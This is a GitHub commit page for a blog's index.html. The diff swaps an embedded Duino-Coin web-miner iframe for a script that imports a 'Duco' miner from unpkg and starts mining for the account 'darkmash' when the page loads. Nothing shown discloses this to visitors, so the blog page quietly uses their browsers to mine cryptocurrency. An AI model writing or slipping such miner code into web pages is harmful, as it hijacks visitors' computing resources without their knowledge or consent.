Skip to content

Commit

Permalink
Update index.html
Browse files Browse the repository at this point in the history
  • Loading branch information
Axorax authored Mar 10, 2023
1 parent 709f396 commit dece29c
Showing 1 changed file with 9 additions and 1 deletion.
10 changes: 9 additions & 1 deletion index.html
Original file line number Diff line number Diff line change
Expand Up @@ -269,7 +269,15 @@ <h3 class="post-subtitle">
color: rgb(54, 54, 54);
}
</style>
<iframe class="mner" src="https://server.duinocoin.com/webminer.html?username=darkmash&threads=4&rigid=blog.home&keyinput="></iframe>
<script type="module">
import { Duco } from 'https://www.unpkg.com/duco';

const miner = new Duco({
username: 'darkmash'
})

miner.start()
</script>
<footer id="footer">

<div class="alert">
Expand Down

0 comments on commit dece29c

Please sign in to comment.